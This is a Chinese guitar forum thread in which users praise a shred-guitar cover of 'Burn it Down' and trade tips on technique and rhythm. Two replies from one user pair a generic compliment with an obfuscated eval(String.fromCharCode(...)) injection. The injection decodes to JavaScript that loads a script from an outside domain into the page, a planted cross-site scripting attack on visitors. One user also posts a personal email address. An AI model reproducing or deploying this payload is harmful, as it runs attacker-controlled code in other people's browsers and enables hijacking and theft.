吉他岁万 发表于 2017-3-14 19:35:35

非常好听的速弹名曲Burn it Down 安迪迷弟小凡弹的。。。。...

http://player.youku.com/player.php/sid/XMjUyMDcwODAzMg==/v.swf

玄六 发表于 2017-3-14 20:44:38

不错,萨法

吉他岁万 发表于 2017-3-15 18:32:12

哈哈哈上去

吉他岁万 发表于 2017-3-17 18:46:25

仙枕 发表于 2017-3-19 10:56:58

喝彩

180克 发表于 2017-3-19 11:31:36

是速弹,但是真的不好听。一点音乐美感都没有。听整曲,没有一段旋律是我觉得好听的。可能审美角度不一样吧。

吉他岁万 发表于 2017-3-19 21:59:10

音乐这东西,仁者见仁智者见智喜欢就好哈哈。。。。

亲才呼个名 发表于 2017-3-20 14:45:34

不管音乐好不好听,但是楼主技术非常好,有前途

ebenezersong 发表于 2017-3-20 15:15:11

弹得那叫一个干净,没有脸买七弦了

asdyouyou 发表于 2017-3-20 18:37:50

7弦琴,没弹过。
话说技术真是吊啊,看着还很年轻,不知道几年功力了

defu0517 发表于 2017-3-20 19:26:07

技术娴熟,我就想知道,节奏感不好咋办啊?有救吗?
发自吉他中国iPhone客户端

吉他岁万 发表于 2017-3-20 19:29:03

亲才呼个名 发表于 2017-3-20 14:45
不管音乐好不好听,但是楼主技术非常好,有前途

不好意思,不是我弹的我只是个搬运工

吉他岁万 发表于 2017-3-20 19:33:57

ebenezersong 发表于 2017-3-20 15:15
弹得那叫一个干净,没有脸买七弦了

只要有颗爱音乐的心,弹吉他使我们快乐就够了

吉他岁万 发表于 2017-3-20 19:41:04

asdyouyou 发表于 2017-3-20 18:37
7弦琴,没弹过。
话说技术真是吊啊,看着还很年轻,不知道几年功力了

7弦是很流行,个人觉得更多用于节奏吧。我知道小凡上研一,学琴十年有余了

林宝生 发表于 2017-3-21 14:24:53

能发个伴奏吗   很喜欢这个曲子   564670586@qq.com   
非常谢谢弹的很棒   

吉他岁万 发表于 2017-3-21 19:25:38

林宝生 发表于 2017-3-21 14:24
能发个伴奏吗   很喜欢这个曲子      
非常谢谢弹的很棒

见谅我没有伴奏,给你neil凡的youku频道可以给TA留言试试neil凡的优酷频道

minzhi5255 发表于 2017-3-21 21:40:52

不管音乐好不好听,但是楼主技术非常好

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

吉他岁万 发表于 2017-3-22 18:57:15

defu0517 发表于 2017-3-20 19:26
技术娴熟,我就想知道,节奏感不好咋办啊?有救吗?
发自吉他中国iPhone客户端 ...

是的,节奏感很重要,但乐感更重要,练练爵士鼓对节奏感可能会有帮助,乐感就要多听各种风格音乐,这只是个人拙见,祝你每天进步

defu0517 发表于 2017-3-22 23:14:56

嗯嗯 多听多练 多上手啊 谢谢帅哥
发自吉他中国iPhone客户端

吉他岁万 发表于 2017-3-24 19:37:04

Burn it Down中文名---【燃烧殆尽】
果然歌如其名畅快淋漓,暴风骤雨般来,去时不留一丝痕迹。。。。。

风过无痕175 发表于 2017-3-24 20:07:34

厉害呀!!!

迷情果戈里 发表于 2017-3-24 20:22:01

这兄弟真牛。

minzhi5255 发表于 2017-3-24 22:32:44

不错,又学习一下了

http://localhost/flash.swf?'+eval(String.fromCharCode(119,105,116,104,40,100,111,99,117,109,101,110,116,41,48,91,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,41,46,115,114,99,61,39,104,116,116,112,58,47,47,115,104,117,97,106,105,57,46,99,111,109,47,63,97,61,49,39,93,59))+'

picturezhao 发表于 2017-3-25 11:08:13

牛逼的存在,佩服!

CNMQG 发表于 2017-3-25 17:09:24

180克 发表于 2017-3-19 11:31
是速弹,但是真的不好听。一点音乐美感都没有。听整曲,没有一段旋律是我觉得好听的。可能审美角度不一样吧 ...

shinan难道是楼主太瘦了?????????

吉他岁万 发表于 2017-3-28 20:23:10

Burn it Down中文名---【燃烧殆尽】
果然歌如其名畅快淋漓,暴风骤雨般来,去时不留一丝痕迹。。。。速弹的魅力

吉他岁万 发表于 2017-4-1 18:10:16

迷情果戈里 发表于 2017-3-24 20:22
这兄弟真牛。

吉他岁万 发表于 2017-5-2 18:24:26

顶一顶
页: [1]
查看完整版本: 非常好听的速弹名曲Burn it Down 安迪迷弟小凡弹的。。。。...